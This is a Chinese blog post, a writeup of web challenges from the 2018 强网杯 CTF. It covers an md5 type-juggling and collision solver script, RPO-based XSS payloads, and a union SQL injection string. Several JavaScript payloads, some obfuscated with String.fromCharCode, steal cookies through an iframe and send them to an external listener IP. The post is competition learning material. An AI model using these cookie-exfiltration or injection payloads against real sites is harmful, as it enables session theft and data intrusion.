<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.3" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.3">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.3">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.3" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="几道web的题解">
<meta property="og:type" content="article">
<meta property="og:title" content="强网杯web部分writeup">
<meta property="og:url" content="http://yoursite.com/2018/04/01/强网杯web部分writeup/index.html">
<meta property="og:site_name" content="Northity">
<meta property="og:description" content="几道web的题解">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://yoursite.com/img/1.png">
<meta property="og:image" content="http://yoursite.com/img/2.png">
<meta property="og:image" content="http://yoursite.com/img/3.png">
<meta property="og:image" content="http://yoursite.com/img/4.png">
<meta property="og:updated_time" content="2018-04-08T05:11:00.926Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="强网杯web部分writeup">
<meta name="twitter:description" content="几道web的题解">
<meta name="twitter:image" content="http://yoursite.com/img/1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.3',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2018/04/01/强网杯web部分writeup/"/>





  <title>强网杯web部分writeup | Northity</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Northity</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2018/04/01/强网杯web部分writeup/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Northity">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="http://northity.com/a.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Northity">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">强网杯web部分writeup</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-04-01T22:54:03+08:00">
                2018-04-01
              </time>
            

            

            
          </span>

          

          
            
              <span class="post-comments-count">
              <span class="post-meta-divider">|</span>
              <span class="post-meta-item-icon">
                <i class="fa fa-comment-o"></i>
              </span>
              
                <a href="/2018/04/01/强网杯web部分writeup/#SOHUCS" itemprop="discussionUrl">
                  <span id="changyan_count_unit" class="post-comments-count hc-comment-count" data-xid="2018/04/01/强网杯web部分writeup/" itemprop="commentsCount"></span>
                </a>
              
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i>本文总阅读量
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>几道web的题解<br><a id="more"></a></p>
<h1 id="web签到"><a href="#web签到" class="headerlink" title="web签到"></a>web签到</h1><p>这道题的思路应该是php特性一路做下去，源码隐藏在了注释中<br>最后要使用md5碰撞的知识<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($_POST[<span class="string">'param1'</span>]!=$_POST[<span class="string">'param2'</span>] &amp;&amp; md5($_POST[<span class="string">'param1'</span>])==md5($_POST[<span class="string">'param2'</span>]))&#123;</span><br><span class="line">							<span class="keyword">die</span>(<span class="string">"success!"</span>);</span><br></pre></td></tr></table></figure></p>
<p>弱类型比较时，0e开头的md5值会被php识别为科学记数法<br>QNKCDZO和240610708进行MD5运算后都为0e开头<br>然后其实就是把弱类型变成了强类型比较<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($_POST[<span class="string">'param1'</span>]!==$_POST[<span class="string">'param2'</span>] &amp;&amp; md5($_POST[<span class="string">'param1'</span>])===md5($_POST[<span class="string">'param2'</span>]))&#123;</span><br><span class="line">							<span class="keyword">die</span>(<span class="string">"success!"</span>);</span><br></pre></td></tr></table></figure></p>
<p>因为MD5(数组)=null，所以可以传入两个数组<br>要将参数param变为param[]即可<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>((string)$_POST[<span class="string">'param1'</span>]!==(string)$_POST[<span class="string">'param2'</span>] &amp;&amp; md5($_POST[<span class="string">'param1'</span>])===md5($_POST[<span class="string">'param2'</span>]))&#123;</span><br><span class="line">					<span class="keyword">die</span>(<span class="string">"success!);</span></span><br></pre></td></tr></table></figure></p>
<p>限制了传入类型，只有md5碰撞了<br>以下是payload，<a href="https://stackoverflow.com/questions/1999824/whats-the-shortest-pair-of-strings-that-causes-an-md5-collision" target="_blank" rel="noopener">md5碰撞参考</a><br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">from</span> binascii <span class="keyword">import</span> unhexlify</span><br><span class="line"></span><br><span class="line">data1 = &#123;</span><br><span class="line">	<span class="string">'param1'</span>:<span class="string">'QNKCDZO'</span>,</span><br><span class="line">	<span class="string">'param2'</span>:<span class="string">'240610708'</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">data2 = &#123;</span><br><span class="line">	<span class="string">'param1[]'</span>:<span class="string">'1.0'</span>,</span><br><span class="line">	<span class="string">'param2[]'</span>:<span class="string">'1'</span></span><br><span class="line">&#125;</span><br><span class="line">data3 = &#123;</span><br><span class="line">	<span class="string">'param1'</span> : <span class="string">b'Oded Goldreich\nOded Goldreich\nOded Goldreich\nOded Go'</span> +  </span><br><span class="line">	unhexlify(<span class="string">'d8050d0019bb9318924caa96dce35cb835b349e144e98c50c22cf461244a4</span></span><br><span class="line"><span class="string">	064bf1afaecc5820d428ad38d6bec89a5ad51e29063dd79b16cf67c12978647f5af123de3acf844085cd025b956'</span>),</span><br><span class="line">	<span class="string">'param2'</span> : <span class="string">b'Neal Koblitz\nNeal Koblitz\nNeal Koblitz\nNeal Koblitz\n'</span> +  </span><br><span class="line">	unhexlify(<span class="string">'75b80e0035f3d2c909af1baddce35cb835b349e144e88c50c22cf461244a40e</span></span><br><span class="line"><span class="string">	4bf1afaecc5820d428ad38d6bec89a5ad51e29063dd79b16cf6fc11978647f5af123de3acf84408dcd025b956'</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://39.107.33.96:10000/index.php"</span></span><br><span class="line"></span><br><span class="line">n = requests.session()</span><br><span class="line">n.cookies.clear()</span><br><span class="line">r = n.get(url)</span><br><span class="line">r = n.post(url,data = data1)</span><br><span class="line">r = n.get(url)</span><br><span class="line">r = n.post(url,data = data2)</span><br><span class="line">r = n.get(url)</span><br><span class="line">r = n.post(url,data = data3)</span><br><span class="line">print(r.text)</span><br></pre></td></tr></table></figure></p>
<p>吐槽一下…其实有md5碰撞直接就能把前面两个过了，所以感觉前两个考点很鸡肋</p>
<h1 id="share-your-mind"><a href="#share-your-mind" class="headerlink" title="share your mind"></a>share your mind</h1><p>这里要用到RPO攻击</p>
<ul>
<li>RPO（Relative Path Overwrite）相对路径覆盖，是一种新型攻击技术，最早由Gareth Heyes在其发表的文章中提出。主要是利用浏览器的一些特性和部分服务端的配置差异导致的漏洞，通过一些技巧，我们可以通过相对路径来引入其他的资源文件，以至于达成我们想要的目的。<br><a href="https://open.appscan.io/article-462.html" target="_blank" rel="noopener">RPO攻击参考链接</a></li>
</ul>
<p>index.php中以相对路径加载了js<br>src=”static/js/jquery.min.js”，考虑RPO攻击，且文章页面可控。写入alert(1)<br>构造url <a href="http://39.107.33.96:20000/index.php/view/article/2702/..%2f..%2f..%2f" target="_blank" rel="noopener">http://39.107.33.96:20000/index.php/view/article/2702/..%2f..%2f..%2f</a><br>弹窗成功<img src="/img/1.png" alt="image"><br>尝试打一下cookie<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">str=&apos;window.open(\&apos;http://182.254.221.239:8081/&apos;+document.cookie+&apos;\&apos;)&apos;;eval(str);</span><br></pre></td></tr></table></figure></p>
<p>因为过滤了尖括号，使用String.fromCharCode可以绕过<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">eval(String.fromCharCode(115,116,114,61,39,119,105,110,100,111,119,46,111,112,101,110,40,92,39,</span><br><span class="line">104,116,116,112,58,47,47,49,56,50,46,50,53,52,46,50,50,49,46,50,51,57,58,56,48,56,49,47,39,43,</span><br><span class="line">100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,43,39,92,39,41,39,59,101,118,97,108,40,115,116,114,41,59))</span><br></pre></td></tr></table></figure></p>
<p>提交 <a href="http://39.107.33.96:20000/index.php/view/article/2739/..%2f..%2f..%2f" target="_blank" rel="noopener">http://39.107.33.96:20000/index.php/view/article/2739/..%2f..%2f..%2f</a><br>这里服务器解析的地址为<a href="http://39.107.33.96:20000/index.php，js加载地址为" target="_blank" rel="noopener">http://39.107.33.96:20000/index.php，js加载地址为</a> <a href="http://39.107.33.96:20000/index.php/view/article/2739/static/js/jquery.min.js" target="_blank" rel="noopener">http://39.107.33.96:20000/index.php/view/article/2739/static/js/jquery.min.js</a><br>服务器会将它解析为 <a href="http://39.107.33.96:20000/index.php/view/article/2739" target="_blank" rel="noopener">http://39.107.33.96:20000/index.php/view/article/2739</a> 从而返回2739的文章内容，而且被当作js执行。<br>在服务器上用nc监听端口<br>得到一个hint<br><img src="/img/2.png" alt="image"><br>HINT=Try to get the cookie of path /QWB_fl4g/QWB/<br>直接用ifarm过去读cookie就可以<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">var i =document.createElement(&quot;iframe&quot;);</span><br><span class="line">i.setAttribute(&quot;src&quot;,&quot;/QWB_fl4g/QWB/&quot;);document.body.appendChild(i);</span><br><span class="line">i.addEventListener(&quot;load&quot;,function()&#123;var content = i.contentWindow.document.cookie; location=&apos;//182.254.221.239:8081/&apos;+btoa(content); &#125;,false);</span><br></pre></td></tr></table></figure></p>
<p>这个payload或许更好理解一点<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">var i=document.createElement(&quot;iframe&quot;);</span><br><span class="line">i.src=&quot;/QWB_fl4g/QWB/&quot;;</span><br><span class="line">i.id=&quot;a&quot;;</span><br><span class="line">document.body.appendChild(i);</span><br><span class="line">i.onload = function ()&#123;</span><br><span class="line">  	var c=document.getElementById(&apos;a&apos;).contentWindow.document.cookie;</span><br><span class="line">	location.href=&quot;http://182.254.221.239:8081&quot;+c;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>同理使用String.fromCharCode<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">eval(String.fromCharCode(118,97,114,32,105,32,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,</span><br><span class="line">69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,32,105,46,115,101,116,65,116,116,114,105,</span><br><span class="line">98,117,116,101,40,34,115,114,99,34,44,34,47,81,87,66,95,102,108,52,103,47,81,87,66,47,34,41,59,100,111,</span><br><span class="line">99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,105,41,59,32,105,</span><br><span class="line">46,97,100,100,69,118,101,110,116,76,105,115,116,101,110,101,114,40,34,108,111,97,100,34,44,102,117,110,99,</span><br><span class="line">116,105,111,110,40,41,123,118,97,114,32,99,111,110,116,101,110,116,32,61,32,105,46,99,111,110,116,101,110,</span><br><span class="line">116,87,105,110,100,111,119,46,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,59,32,108,111,99,97,</span><br><span class="line">116,105,111,110,61,39,47,47,49,56,50,46,50,53,52,46,50,50,49,46,50,51,57,58,56,48,56,49,47,39,43,98,116,111,</span><br><span class="line">97,40,99,111,110,116,101,110,116,41,59,32,125,44,102,97,108,115,101,41,59))</span><br></pre></td></tr></table></figure></p>
<p>提交 <a href="http://39.107.33.96:20000/index.php/view/article/2740/..%2f..%2f..%2f" target="_blank" rel="noopener">http://39.107.33.96:20000/index.php/view/article/2740/..%2f..%2f..%2f</a><br><img src="/img/3.png" alt="image"><br>Base64解码一下 flag=QWB{flag_is_f43kth4rpo}</p>
<h1 id="three-hits"><a href="#three-hits" class="headerlink" title="three hits"></a>three hits</h1><p>一个简单的二次注入，注意limit的使用<br>9999999 and 1 =2 union select 1,(select table_name from information_schema.tables where table_schema=’qwb’ limit 0,1),3,4–<br><img src="/img/4.png" alt="image"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/02/07/Python笔记 0x02/" rel="next" title="Python笔记 0x02">
                <i class="fa fa-chevron-left"></i> Python笔记 0x02
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="SOHUCS"></div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="http://northity.com/a.jpg"
                alt="Northity" />
            
              <p class="site-author-name" itemprop="name">Northity</p>
              <p class="site-description motion-element" itemprop="description">每一顶白帽都有一道黑边</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">2</span>
                  <span class="site-state-item-name">标签</span>
                
              </div>
            

          </nav>

          

          <div class="links-of-author motion-element">
            
              
                <span class="links-of-author-item">
                  <a href="https://github.com/Northity" target="_blank" title="GitHub">
                    
                      <i class="fa fa-fw fa-github"></i>GitHub</a>
                </span>
              
            
          </div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://northity.cn/" title="关于我" target="_blank">关于我</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://yhis.me/" title="HacL" target="_blank">HacL</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://midnighter.cn/" title="墨鱼" target="_blank">墨鱼</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://cyru1s.com/" title="cyru1s" target="_blank">cyru1s</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#web签到"><span class="nav-number">1.</span> <span class="nav-text">web签到</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#share-your-mind"><span class="nav-number">2.</span> <span class="nav-text">share your mind</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#three-hits"><span class="nav-number">3.</span> <span class="nav-text">three hits</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2017 &mdash; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Northity</span>

  
</div>



<div class="theme-info">
  <div class="powered-by"></div>
  <span class="post-count">博客全站共字</span>
</div>
        
<div class="busuanzi-count">
  <script async src="https://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>本站访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.3"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  




  
    <script type="text/javascript">
    (function(){
      var appid = 'cytlxVSW4';
      var conf = '85789fd263fbfafbec673fb731a7673c';
      var width = window.innerWidth || document.documentElement.clientWidth;
      if (width < 960) {
      window.document.write('<script id="changyan_mobile_js" charset="utf-8" type="text/javascript" src="https://changyan.sohu.com/upload/mobile/wap-js/changyan_mobile.js?client_id=' + appid + '&conf=' + conf + '"><\/script>'); } else { var loadJs=function(d,a){var c=document.getElementsByTagName("head")[0]||document.head||document.documentElement;var b=document.createElement("script");b.setAttribute("type","text/javascript");b.setAttribute("charset","UTF-8");b.setAttribute("src",d);if(typeof a==="function"){if(window.attachEvent){b.onreadystatechange=function(){var e=b.readyState;if(e==="loaded"||e==="complete"){b.onreadystatechange=null;a()}}}else{b.onload=a}}c.appendChild(b)};loadJs("https://changyan.sohu.com/upload/changyan.js",function(){
        window.changyan.api.config({appid:appid,conf:conf})});
      }
    })();
    </script>
    <script type="text/javascript" src="https://assets.changyan.sohu.com/upload/plugins/plugins.count.js"></script>
  









  





  

  

  

  
  

  

  

  

</body>
</html>
